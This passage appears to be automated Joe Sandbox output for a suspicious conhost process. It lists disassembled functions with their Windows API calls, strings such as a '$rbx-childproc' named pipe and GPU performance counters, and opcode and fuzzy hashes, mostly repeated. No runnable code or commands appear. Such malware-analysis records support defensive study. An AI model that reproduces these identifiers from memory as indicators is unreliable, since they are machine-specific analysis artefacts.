Associated: 00000013.00000002.3060239866.0000013F08EB2000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000013.00000002.3060760816.0000013F08EB9000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_13f08e90000_conhost.jbxd

Similarity

API ID: Library$LoadProtectVirtual$AddressErrorFreeLastProc
String ID: AppPolicyGetProcessTerminationMethod$api-ms-$ext-ms-
API String ID: 740688525-1880043860
Opcode ID: 76271e0e5533c610f4bce9abf661b1e9c3d7f925dc4d85dc9c81cd2c8526c81c
Instruction ID: 4a98a88d6d284d0f9c88db99b35eb8b25f4778613dad35e0901481351cf5e59e
Opcode Fuzzy Hash: 76271e0e5533c610f4bce9abf661b1e9c3d7f925dc4d85dc9c81cd2c8526c81c
Instruction Fuzzy Hash: AD51C631B0078491EA1C9BDAD8403E56A52B749BB0F580739EE7D473D2EFBCD6078242

Function 0000013F08E633A8 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 74memoryCOMMON

Download Yara Rule

APIs

PdhGetCounterInfoW.PDH ref: 0000013F08E633FD
GetProcessHeap.KERNEL32 ref: 0000013F08E63412
HeapAlloc.KERNEL32 ref: 0000013F08E63420
PdhGetCounterInfoW.PDH ref: 0000013F08E63436
StrCmpW.SHLWAPI ref: 0000013F08E6344B

Part of subcall function 0000013F08E63950: StrCmpNW.SHLWAPI ref: 0000013F08E63972
Part of subcall function 0000013F08E63950: StrStrW.SHLWAPI ref: 0000013F08E63990
Part of subcall function 0000013F08E63950: StrToIntW.SHLWAPI ref: 0000013F08E639B7

GetProcessHeap.KERNEL32 ref: 0000013F08E63488
HeapFree.KERNEL32 ref: 0000013F08E63496

Strings

\GPU Engine(*)\Running Time, xrefs: 0000013F08E63444

Memory Dump Source

Source File: 00000013.00000002.3055761550.0000013F08E61000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000013F08E60000, based on PE: true

Associated: 00000013.00000002.3055284000.0000013F08E60000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000013.00000002.3056628998.0000013F08E75000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000013.00000002.3057143026.0000013F08E80000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000013.00000002.3057445918.0000013F08E82000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000013.00000002.3057817933.0000013F08E89000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_13f08e60000_conhost.jbxd

Similarity

API ID: Heap$CounterInfoProcess$AllocFree
String ID: \GPU Engine(*)\Running Time
API String ID: 1943346504-1805530042
Opcode ID: 3c893031c2ac124323773ad806ea6b122c6292a63b4d30b410812c40362314f8
Instruction ID: 51ba75afa413aa699ef082d611222e06f217c10dfe0d8860b143505302922adf
Opcode Fuzzy Hash: 3c893031c2ac124323773ad806ea6b122c6292a63b4d30b410812c40362314f8
Instruction Fuzzy Hash: 0931C432E00A4096E739CF96E804399A7A2FB88BD5F440538EE4943B26DF3CD6578301

Function 0000013F08E933A8 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 74memoryCOMMON

Download Yara Rule

APIs

PdhGetCounterInfoW.PDH ref: 0000013F08E933FD
GetProcessHeap.KERNEL32 ref: 0000013F08E93412
HeapAlloc.KERNEL32 ref: 0000013F08E93420
PdhGetCounterInfoW.PDH ref: 0000013F08E93436
StrCmpW.SHLWAPI ref: 0000013F08E9344B

Part of subcall function 0000013F08E93950: StrCmpNW.SHLWAPI ref: 0000013F08E93972
Part of subcall function 0000013F08E93950: StrStrW.SHLWAPI ref: 0000013F08E93990
Part of subcall function 0000013F08E93950: StrToIntW.SHLWAPI ref: 0000013F08E939B7

GetProcessHeap.KERNEL32 ref: 0000013F08E93488
HeapFree.KERNEL32 ref: 0000013F08E93496

Strings

\GPU Engine(*)\Running Time, xrefs: 0000013F08E93444

Memory Dump Source

Source File: 00000013.00000002.3058635336.0000013F08E91000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000013F08E90000, based on PE: true

Associated: 00000013.00000002.3058223651.0000013F08E90000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000013.00000002.3059184218.0000013F08EA5000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000013.00000002.3059730149.0000013F08EB0000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000013.00000002.3060239866.0000013F08EB2000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000013.00000002.3060760816.0000013F08EB9000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_13f08e90000_conhost.jbxd

Similarity

API ID: Heap$CounterInfoProcess$AllocFree
String ID: \GPU Engine(*)\Running Time
API String ID: 1943346504-1805530042
Opcode ID: 3c893031c2ac124323773ad806ea6b122c6292a63b4d30b410812c40362314f8
Instruction ID: a14e73177fb6ec818ec093f483535a2f273ec9b09c2bf708a0138a00ffdf974b
Opcode Fuzzy Hash: 3c893031c2ac124323773ad806ea6b122c6292a63b4d30b410812c40362314f8
Instruction Fuzzy Hash: 3131D632E00A8096E729CF96A8043D9A7A2F798FD4F450538FE8943B26DF7CD6578301

Function 0000013F08E634B8 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 73memoryCOMMON

Download Yara Rule

APIs

PdhGetCounterInfoW.PDH ref: 0000013F08E63516
GetProcessHeap.KERNEL32 ref: 0000013F08E63527
HeapAlloc.KERNEL32 ref: 0000013F08E63535
PdhGetCounterInfoW.PDH ref: 0000013F08E6354B
StrCmpW.SHLWAPI ref: 0000013F08E63560

Part of subcall function 0000013F08E63950: StrCmpNW.SHLWAPI ref: 0000013F08E63972
Part of subcall function 0000013F08E63950: StrStrW.SHLWAPI ref: 0000013F08E63990
Part of subcall function 0000013F08E63950: StrToIntW.SHLWAPI ref: 0000013F08E639B7

GetProcessHeap.KERNEL32 ref: 0000013F08E6358D
HeapFree.KERNEL32 ref: 0000013F08E6359B

Strings

\GPU Engine(*)\Utilization Percentage, xrefs: 0000013F08E63559

Memory Dump Source

Source File: 00000013.00000002.3055761550.0000013F08E61000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000013F08E60000, based on PE: true

Associated: 00000013.00000002.3055284000.0000013F08E60000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000013.00000002.3056628998.0000013F08E75000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000013.00000002.3057143026.0000013F08E80000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000013.00000002.3057445918.0000013F08E82000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000013.00000002.3057817933.0000013F08E89000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_13f08e60000_conhost.jbxd

Similarity

API ID: Heap$CounterInfoProcess$AllocFree
String ID: \GPU Engine(*)\Utilization Percentage
API String ID: 1943346504-3507739905
Opcode ID: 4dfb6054f5336d4a701c3ca7a3d18610e9584f8b2694925bec2ac2df63a9e25f
Instruction ID: 5f13050281f0528891d4aec0262be0223551f2dd6dae4639aec2e61a1bc9b2d9
Opcode Fuzzy Hash: 4dfb6054f5336d4a701c3ca7a3d18610e9584f8b2694925bec2ac2df63a9e25f
Instruction Fuzzy Hash: B3318131A10B4186E728DFAAE8447996BA2F784FD5F444139EE4A43726DF3CD653C701

Function 0000013F08E934B8 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 73memoryCOMMON

Download Yara Rule

APIs

PdhGetCounterInfoW.PDH ref: 0000013F08E93516
GetProcessHeap.KERNEL32 ref: 0000013F08E93527
HeapAlloc.KERNEL32 ref: 0000013F08E93535
PdhGetCounterInfoW.PDH ref: 0000013F08E9354B
StrCmpW.SHLWAPI ref: 0000013F08E93560

Part of subcall function 0000013F08E93950: StrCmpNW.SHLWAPI ref: 0000013F08E93972
Part of subcall function 0000013F08E93950: StrStrW.SHLWAPI ref: 0000013F08E93990
Part of subcall function 0000013F08E93950: StrToIntW.SHLWAPI ref: 0000013F08E939B7

GetProcessHeap.KERNEL32 ref: 0000013F08E9358D
HeapFree.KERNEL32 ref: 0000013F08E9359B

Strings

\GPU Engine(*)\Utilization Percentage, xrefs: 0000013F08E93559

Memory Dump Source

Source File: 00000013.00000002.3058635336.0000013F08E91000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000013F08E90000, based on PE: true

Associated: 00000013.00000002.3058223651.0000013F08E90000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000013.00000002.3059184218.0000013F08EA5000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000013.00000002.3059730149.0000013F08EB0000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000013.00000002.3060239866.0000013F08EB2000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000013.00000002.3060760816.0000013F08EB9000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_13f08e90000_conhost.jbxd

Similarity

API ID: Heap$CounterInfoProcess$AllocFree
String ID: \GPU Engine(*)\Utilization Percentage
API String ID: 1943346504-3507739905
Opcode ID: 4dfb6054f5336d4a701c3ca7a3d18610e9584f8b2694925bec2ac2df63a9e25f
Instruction ID: 8487525b08424002038c187266372898acc7e2ebf1c03973e613d71a73e0ef91
Opcode Fuzzy Hash: 4dfb6054f5336d4a701c3ca7a3d18610e9584f8b2694925bec2ac2df63a9e25f
Instruction Fuzzy Hash: B931D731E00B4196E718DF9AA444799BBA2F788F94F045038EE8A43726DF7CD647C701

Function 0000013F08E6A22C Relevance: 12.6, APIs: 4, Strings: 3, Instructions: 310COMMON

Download Yara Rule

APIs

__FrameHandler3::GetHandlerSearchState.LIBVCRUNTIME ref: 0000013F08E6A289

Part of subcall function 0000013F08E6B144: __GetUnwindTryBlock.LIBCMT ref: 0000013F08E6B187
Part of subcall function 0000013F08E6B144: __SetUnwindTryBlock.LIBVCRUNTIME ref: 0000013F08E6B1AC

Is_bad_exception_allowed.LIBVCRUNTIME ref: 0000013F08E6A361
__FrameHandler3::ExecutionInCatch.LIBVCRUNTIME ref: 0000013F08E6A5AF
std::bad_alloc::bad_alloc.LIBCMT ref: 0000013F08E6A6BC

Strings

csm, xrefs: 0000013F08E6A384
csm, xrefs: 0000013F08E6A2A3
csm, xrefs: 0000013F08E6A30A

Memory Dump Source

Source File: 00000013.00000002.3055761550.0000013F08E61000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000013F08E60000, based on PE: true

Associated: 00000013.00000002.3055284000.0000013F08E60000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000013.00000002.3056628998.0000013F08E75000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000013.00000002.3057143026.0000013F08E80000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000013.00000002.3057445918.0000013F08E82000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000013.00000002.3057817933.0000013F08E89000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_13f08e60000_conhost.jbxd

Similarity

API ID: BlockFrameHandler3::Unwind$CatchExecutionHandlerIs_bad_exception_allowedSearchStatestd::bad_alloc::bad_alloc
String ID: csm$csm$csm
API String ID: 849930591-393685449
Opcode ID: 037bd7d014dbf073bd717ac1516acd742bbf86a7991252edd6e45b1783c3a634
Instruction ID: bce1b4131f8d1c6882e34cfd7861b44665b89da7dfc6fea6e767a31d1ce06383
Opcode Fuzzy Hash: 037bd7d014dbf073bd717ac1516acd742bbf86a7991252edd6e45b1783c3a634
Instruction Fuzzy Hash: 7AD17F32D047908AEB28DBA994403DD7FA2F7457D8F101139FA9967797CB38C6A2C702

Function 0000013F08E9A22C Relevance: 12.6, APIs: 4, Strings: 3, Instructions: 310COMMON

Download Yara Rule

APIs

__FrameHandler3::GetHandlerSearchState.LIBVCRUNTIME ref: 0000013F08E9A289

Part of subcall function 0000013F08E9B144: __GetUnwindTryBlock.LIBCMT ref: 0000013F08E9B187
Part of subcall function 0000013F08E9B144: __SetUnwindTryBlock.LIBVCRUNTIME ref: 0000013F08E9B1AC

Is_bad_exception_allowed.LIBVCRUNTIME ref: 0000013F08E9A361
__FrameHandler3::ExecutionInCatch.LIBVCRUNTIME ref: 0000013F08E9A5AF
std::bad_alloc::bad_alloc.LIBCMT ref: 0000013F08E9A6BC

Strings

csm, xrefs: 0000013F08E9A2A3
csm, xrefs: 0000013F08E9A30A
csm, xrefs: 0000013F08E9A384

Memory Dump Source

Source File: 00000013.00000002.3058635336.0000013F08E91000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000013F08E90000, based on PE: true

Associated: 00000013.00000002.3058223651.0000013F08E90000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000013.00000002.3059184218.0000013F08EA5000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000013.00000002.3059730149.0000013F08EB0000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000013.00000002.3060239866.0000013F08EB2000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000013.00000002.3060760816.0000013F08EB9000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_13f08e90000_conhost.jbxd

Similarity

API ID: BlockFrameHandler3::Unwind$CatchExecutionHandlerIs_bad_exception_allowedSearchStatestd::bad_alloc::bad_alloc
String ID: csm$csm$csm
API String ID: 849930591-393685449
Opcode ID: 037bd7d014dbf073bd717ac1516acd742bbf86a7991252edd6e45b1783c3a634
Instruction ID: ecd2f4026fa92adcdb3c6dfa28eb563a24c868728f3069850cd927dc50e5f692
Opcode Fuzzy Hash: 037bd7d014dbf073bd717ac1516acd742bbf86a7991252edd6e45b1783c3a634
Instruction Fuzzy Hash: EED16072A047908AEB68DFA994403DD7BA2FB45798F100139FEC957797DB78C682C702

Function 0000013F081C962C Relevance: 12.6, APIs: 4, Strings: 3, Instructions: 310COMMON

Download Yara Rule

APIs

__FrameHandler3::GetHandlerSearchState.LIBVCRUNTIME ref: 0000013F081C9689

Part of subcall function 0000013F081CA544: __GetUnwindTryBlock.LIBCMT ref: 0000013F081CA587
Part of subcall function 0000013F081CA544: __SetUnwindTryBlock.LIBVCRUNTIME ref: 0000013F081CA5AC

Is_bad_exception_allowed.LIBVCRUNTIME ref: 0000013F081C9761
__FrameHandler3::ExecutionInCatch.LIBVCRUNTIME ref: 0000013F081C99AF
std::bad_alloc::bad_alloc.LIBCMT ref: 0000013F081C9ABC

Strings

csm, xrefs: 0000013F081C9784
csm, xrefs: 0000013F081C96A3
csm, xrefs: 0000013F081C970A

Memory Dump Source

Source File: 00000013.00000003.2617755503.0000013F081C0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000013F081C0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_3_13f081c0000_conhost.jbxd

Similarity

API ID: BlockFrameHandler3::Unwind$CatchExecutionHandlerIs_bad_exception_allowedSearchStatestd::bad_alloc::bad_alloc
String ID: csm$csm$csm
API String ID: 849930591-393685449
Opcode ID: 99dcd42e55987f84e0a9dbea2fa1ae191c477915d496a4e3a9a042af50ac5220
Instruction ID: 8185e2bdd7b651b9ae05a1592e3cd0d3d4748199ea2741b3d7ab9d81f93f8e76
Opcode Fuzzy Hash: 99dcd42e55987f84e0a9dbea2fa1ae191c477915d496a4e3a9a042af50ac5220
Instruction Fuzzy Hash: 87D1B572A0478086EB68DF69D4813ED7FA1FB45798FA00129FE8957B97DB34C292C700

Function 0000013F08E6104C Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 99memoryregistryCOMMON

Download Yara Rule

APIs

RegQueryInfoKeyW.ADVAPI32 ref: 0000013F08E610B1
RegEnumValueW.ADVAPI32 ref: 0000013F08E61117
GetProcessHeap.KERNEL32 ref: 0000013F08E6115A
HeapAlloc.KERNEL32 ref: 0000013F08E61168
GetProcessHeap.KERNEL32 ref: 0000013F08E61185
HeapFree.KERNEL32 ref: 0000013F08E61193

Strings

d, xrefs: 0000013F08E610D6

Memory Dump Source

Source File: 00000013.00000002.3055761550.0000013F08E61000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000013F08E60000, based on PE: true

Associated: 00000013.00000002.3055284000.0000013F08E60000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000013.00000002.3056628998.0000013F08E75000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000013.00000002.3057143026.0000013F08E80000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000013.00000002.3057445918.0000013F08E82000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000013.00000002.3057817933.0000013F08E89000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_13f08e60000_conhost.jbxd

Similarity

API ID: Heap$Process$AllocEnumFreeInfoQueryValue
String ID: d
API String ID: 3743429067-2564639436
Opcode ID: 214df63eb12f5006524d9de65027155270ac54fbc8f89443ffbfb24959d92ecf
Instruction ID: 5c8331b868025f6b4259b0355af5f24098f85f8d1a52d7978153ff975d2c2170
Opcode Fuzzy Hash: 214df63eb12f5006524d9de65027155270ac54fbc8f89443ffbfb24959d92ecf
Instruction Fuzzy Hash: 2F41A333614B80DAE765CF65E44439E7BA2F388B98F448129EB8907B58DF3CC556CB41

Function 0000013F08E9104C Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 99memoryregistryCOMMON

Download Yara Rule

APIs

RegQueryInfoKeyW.ADVAPI32 ref: 0000013F08E910B1
RegEnumValueW.ADVAPI32 ref: 0000013F08E91117
GetProcessHeap.KERNEL32 ref: 0000013F08E9115A
HeapAlloc.KERNEL32 ref: 0000013F08E91168
GetProcessHeap.KERNEL32 ref: 0000013F08E91185
HeapFree.KERNEL32 ref: 0000013F08E91193

Strings

d, xrefs: 0000013F08E910D6

Memory Dump Source

Source File: 00000013.00000002.3058635336.0000013F08E91000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000013F08E90000, based on PE: true

Associated: 00000013.00000002.3058223651.0000013F08E90000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000013.00000002.3059184218.0000013F08EA5000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000013.00000002.3059730149.0000013F08EB0000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000013.00000002.3060239866.0000013F08EB2000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000013.00000002.3060760816.0000013F08EB9000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_13f08e90000_conhost.jbxd

Similarity

API ID: Heap$Process$AllocEnumFreeInfoQueryValue
String ID: d
API String ID: 3743429067-2564639436
Opcode ID: 214df63eb12f5006524d9de65027155270ac54fbc8f89443ffbfb24959d92ecf
Instruction ID: 601e10264774004a599a900e9f249bba5200d6af0c5ba29cb533b8b8d97cf7f7
Opcode Fuzzy Hash: 214df63eb12f5006524d9de65027155270ac54fbc8f89443ffbfb24959d92ecf
Instruction Fuzzy Hash: A8418333614B80D6E764CFA5E44439EBBA2F388B98F448129EE8907758EF7CD546CB41

Function 0000013F08E62518 Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 44filethreadCOMMON

Download Yara Rule

APIs

GetProcessIdOfThread.KERNEL32 ref: 0000013F08E6252D
GetCurrentProcessId.KERNEL32 ref: 0000013F08E62537
CreateFileW.KERNEL32 ref: 0000013F08E62568
WriteFile.KERNEL32 ref: 0000013F08E62590
ReadFile.KERNEL32 ref: 0000013F08E625AF
CloseHandle.KERNEL32 ref: 0000013F08E625B8

Strings

\\.\pipe\$rbx-childproc, xrefs: 0000013F08E62549

Memory Dump Source

Source File: 00000013.00000002.3055761550.0000013F08E61000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000013F08E60000, based on PE: true

Associated: 00000013.00000002.3055284000.0000013F08E60000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000013.00000002.3056628998.0000013F08E75000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000013.00000002.3057143026.0000013F08E80000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000013.00000002.3057445918.0000013F08E82000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000013.00000002.3057817933.0000013F08E89000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_13f08e60000_conhost.jbxd

Similarity

API ID: File$Process$CloseCreateCurrentHandleReadThreadWrite
String ID: \\.\pipe\$rbx-childproc
API String ID: 166002920-1828357524
Opcode ID: 2f0528e3c87d94e1cfa1c202f0bfd1f6cfafc65532576ba32c2772f85af7f427
Instruction ID: bc466d58f7156998a3addad7542c62e15755a8a3fee443b59fd5f210c167d2c0
Opcode Fuzzy Hash: 2f0528e3c87d94e1cfa1c202f0bfd1f6cfafc65532576ba32c2772f85af7f427
Instruction Fuzzy Hash: 45115131A14740C3F7248B65F41479A7B61F389BD5F940329FA5902BA9DF3CC246CB41

Function 0000013F08E92518 Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 44filethreadCOMMON

Download Yara Rule

APIs

GetProcessIdOfThread.KERNEL32 ref: 0000013F08E9252D
GetCurrentProcessId.KERNEL32 ref: 0000013F08E92537
CreateFileW.KERNEL32 ref: 0000013F08E92568
WriteFile.KERNEL32 ref: 0000013F08E92590
ReadFile.KERNEL32 ref: 0000013F08E925AF
CloseHandle.KERNEL32 ref: 0000013F08E925B8

Strings

\\.\pipe\$rbx-childproc, xrefs: 0000013F08E92549

Memory Dump Source

Source File: 00000013.00000002.3058635336.0000013F08E91000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000013F08E90000, based on PE: true

Associated: 00000013.00000002.3058223651.0000013F08E90000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000013.00000002.3059184218.0000013F08EA5000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000013.00000002.3059730149.0000013F08EB0000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000013.00000002.3060239866.0000013F08EB2000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000013.00000002.3060760816.0000013F08EB9000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_13f08e90000_conhost.jbxd

Similarity

API ID: File$Process$CloseCreateCurrentHandleReadThreadWrite
String ID: \\.\pipe\$rbx-childproc
API String ID: 166002920-1828357524
Opcode ID: 2f0528e3c87d94e1cfa1c202f0bfd1f6cfafc65532576ba32c2772f85af7f427
Instruction ID: 7865197b1631c4c4fb60af6e90d380383a69c677d2d4cbe4d70cc52513de012d
Opcode Fuzzy Hash: 2f0528e3c87d94e1cfa1c202f0bfd1f6cfafc65532576ba32c2772f85af7f427
Instruction Fuzzy Hash: 10115431A14740C3E7148BA5F49439ABB61F385BD4F544329FA5902B99CF7CC245CB41

Function 0000013F08E67C50 Relevance: 12.2, APIs: 8, Instructions: 227COMMON

Download Yara Rule

APIs

__scrt_dllmain_crt_thread_attach.LIBCMT ref: 0000013F08E67C78
__scrt_acquire_startup_lock.LIBCMT ref: 0000013F08E67CCA
_RTC_Initialize.LIBCMT ref: 0000013F08E67CF8
__scrt_dllmain_after_initialize_c.LIBCMT ref: 0000013F08E67D1E
__scrt_release_startup_lock.LIBCMT ref: 0000013F08E67D49

Memory Dump Source

Source File: 00000013.00000002.3055761550.0000013F08E61000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000013F08E60000, based on PE: true

Associated: 00000013.00000002.3055284000.0000013F08E60000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000013.00000002.3056628998.0000013F08E75000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000013.00000002.3057143026.0000013F08E80000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000013.00000002.3057445918.0000013F08E82000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000013.00000002.3057817933.0000013F08E89000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_13f08e60000_conhost.jbxd

Similarity

API ID: Initialize__scrt_acquire_startup_lock__scrt_dllmain_after_initialize_c__scrt_dllmain_crt_thread_attach__scrt_release_startup_lock
String ID:
API String ID: 190073905-0
Opcode ID: 53754b190eade9ddf9a12de580ea1969ce11fb76c0c5d26610c7ca44f503f6dd
Instruction ID: 58d3bfe895878512ed9e7b4c8ec118540dc7ea73621a1efbb21f8eb22ae1ce72
Opcode Fuzzy Hash: 53754b190eade9ddf9a12de580ea1969ce11fb76c0c5d26610c7ca44f503f6dd
Instruction Fuzzy Hash: E381C330E1064186FA6C9BED98413D96E93AB867C8F54463DF90947397DB3CCB678702

Function 0000013F08E97C50 Relevance: 12.2, APIs: 8, Instructions: 227COMMON

Download Yara Rule

APIs

__scrt_dllmain_crt_thread_attach.LIBCMT ref: 0000013F08E97C78
__scrt_acquire_startup_lock.LIBCMT ref: 0000013F08E97CCA
_RTC_Initialize.LIBCMT ref: 0000013F08E97CF8
__scrt_dllmain_after_initialize_c.LIBCMT ref: 0000013F08E97D1E
__scrt_release_startup_lock.LIBCMT ref: 0000013F08E97D49

Memory Dump Source

Source File: 00000013.00000002.3058635336.0000013F08E91000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000013F08E90000, based on PE: true

Associated: 00000013.00000002.3058223651.0000013F08E90000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000013.00000002.3059184218.0000013F08EA5000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000013.00000002.3059730149.0000013F08EB0000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000013.00000002.3060239866.0000013F08EB2000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000013.00000002.3060760816.0000013F08EB9000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_13f08e90000_conhost.jbxd

Similarity

API ID: Initialize__scrt_acquire_startup_lock__scrt_dllmain_after_initialize_c__scrt_dllmain_crt_thread_attach__scrt_release_startup_lock
String ID:
API String ID: 190073905-0
Opcode ID: 53754b190eade9ddf9a12de580ea1969ce11fb76c0c5d26610c7ca44f503f6dd
Instruction ID: bbb6c0683f759deb6f0e1bc1c54bccf698b1ac8305fb3418f744727dab93c578
Opcode Fuzzy Hash: 53754b190eade9ddf9a12de580ea1969ce11fb76c0c5d26610c7ca44f503f6dd
Instruction Fuzzy Hash: DF81B831E2469085FA5C9FED98413D95E93AB86B84F44403DFD8857397DABCCB4B8702

Function 0000013F081C7050 Relevance: 12.2, APIs: 8, Instructions: 227COMMON

Download Yara Rule

APIs

__scrt_dllmain_crt_thread_attach.LIBCMT ref: 0000013F081C7078
__scrt_acquire_startup_lock.LIBCMT ref: 0000013F081C70CA
_RTC_Initialize.LIBCMT ref: 0000013F081C70F8
__scrt_dllmain_after_initialize_c.LIBCMT ref: 0000013F081C711E
__scrt_release_startup_lock.LIBCMT ref: 0000013F081C7149

Memory Dump Source

Source File: 00000013.00000003.2617755503.0000013F081C0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000013F081C0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_3_13f081c0000_conhost.jbxd

Similarity

API ID: Initialize__scrt_acquire_startup_lock__scrt_dllmain_after_initialize_c__scrt_dllmain_crt_thread_attach__scrt_release_startup_lock
String ID:
API String ID: 190073905-0
Opcode ID: 53754b190eade9ddf9a12de580ea1969ce11fb76c0c5d26610c7ca44f503f6dd
Instruction ID: bc38bb2d8947d847f2fbd68ab32f43eef4ccafab8e3ebb3f46e74473c95c3809
Opcode Fuzzy Hash: 53754b190eade9ddf9a12de580ea1969ce11fb76c0c5d26610c7ca44f503f6dd
Instruction Fuzzy Hash: 68816F71E0024146F65CAB6ED8413D96E93AF86780FA4983DFA4A477D7DBB8C7478B00

Function 0000013F08E69AAC Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 88libraryloaderCOMMONLIBRARYCODE

Download Yara Rule

APIs

LoadLibraryExW.KERNEL32(?,?,?,0000013F08E69C6B,?,?,?,0000013F08E6945C,?,?,?,?,0000013F08E68F65), ref: 0000013F08E69B31
GetLastError.KERNEL32(?,?,?,0000013F08E69C6B,?,?,?,0000013F08E6945C,?,?,?,?,0000013F08E68F65), ref: 0000013F08E69B3F
LoadLibraryExW.KERNEL32(?,?,?,0000013F08E69C6B,?,?,?,0000013F08E6945C,?,?,?,?,0000013F08E68F65), ref: 0000013F08E69B69
FreeLibrary.KERNEL32(?,?,?,0000013F08E69C6B,?,?,?,0000013F08E6945C,?,?,?,?,0000013F08E68F65), ref: 0000013F08E69BD7
GetProcAddress.KERNEL32(?,?,?,0000013F08E69C6B,?,?,?,0000013F08E6945C,?,?,?,?,0000013F08E68F65), ref: 0000013F08E69BE3

Strings

api-ms-, xrefs: 0000013F08E69B51

Memory Dump Source

Source File: 00000013.00000002.3055761550.0000013F08E61000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000013F08E60000, based on PE: true

Associated: 00000013.00000002.3055284000.0000013F08E60000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000013.00000002.3056628998.0000013F08E75000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000013.00000002.3057143026.0000013F08E80000.00000004.00001000.00020000.00000000.sdmpDownload File
